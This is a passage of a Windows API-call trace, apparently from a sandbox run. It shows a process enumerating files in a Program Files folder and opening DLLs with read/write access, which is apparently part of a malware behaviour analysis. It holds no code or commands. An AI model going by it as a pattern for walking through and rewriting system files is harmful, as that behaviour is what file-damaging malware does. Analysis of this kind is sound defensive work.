lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.547] GetLastError () returned 0x5 [0087.547] GetLastError () returned 0x5 [0087.547] SetLastError (dwErrCode=0x5) [0087.547] GetLastError () returned 0x5 [0087.547] SetLastError (dwErrCode=0x5) [0087.547] GetLastError () returned 0x5 [0087.548] SetLastError (dwErrCode=0x5) [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0087.548] AreFileApisANSI () returned 1 [0087.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46278 [0087.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46278, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC") returned 50 [0087.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC" (normalized: "c:\\program files\\common files\\microsoft shared\\vc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.548] GetLastError () returned 0x5 [0087.548] GetLastError () returned 0x5 [0087.548] SetLastError (dwErrCode=0x5) [0087.548] GetLastError () returned 0x5 [0087.548] SetLastError (dwErrCode=0x5) [0087.548] GetLastError () returned 0x5 [0087.548] SetLastError (dwErrCode=0x5) [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0087.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0087.549] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="VGX", cAlternateFileName="")) returned 1 [0087.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.549] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78410 [0087.549] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.550] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8127e00, ftCreationTime.dwHighDateTime=0x1cbd076, ftLastAccessTime.dwLowDateTime=0xcd0a4098, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xd8127e00, ftLastWriteTime.dwHighDateTime=0x1cbd076, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.551] AreFileApisANSI () returned 1 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", lpUsedDefaultChar=0x0) returned 63 [0087.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.551] AreFileApisANSI () returned 1 [0087.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6de98 [0087.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0087.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.554] GetFileType (hFile=0x424) returned 0x1 [0087.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0087.554] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.554] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.554] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.555] CloseHandle (hObject=0x424) returned 1 [0087.555] AreFileApisANSI () returned 1 [0087.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6dfa8 [0087.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0087.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.555] GetFileType (hFile=0x424) returned 0x1 [0087.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0087.555] CloseHandle (hObject=0x424) returned 1 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.557] AreFileApisANSI () returned 1 [0087.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e030 [0087.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0087.557] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8127e00, ftCreationTime.dwHighDateTime=0x1cbd076, ftLastAccessTime.dwLowDateTime=0xcd0a4098, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xd8127e00, ftLastWriteTime.dwHighDateTime=0x1cbd076, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50)) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.557] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe87c00, ftCreationTime.dwHighDateTime=0x1cbfe36, ftLastAccessTime.dwLowDateTime=0x2ce22546, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0xcfe87c00, ftLastWriteTime.dwHighDateTime=0x1cbfe36, nFileSizeHigh=0x0, nFileSizeLow=0xd0d50, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdia90.dll", cAlternateFileName="")) returned 1 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0087.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0087.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0087.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0087.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0087.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.558] AreFileApisANSI () returned 1 [0087.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll", lpUsedDefaultChar=0x0) returned 62 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0087.558] AreFileApisANSI () returned 1 [0087.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0087.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0087.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 62 [0087.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.663] GetFileType (hFile=0x424) returned 0x1 [0087.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0087.663] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0087.663] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0087.663] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0087.663] CloseHandle (hObject=0x424) returned 1 [0087.664] AreFileApisANSI () 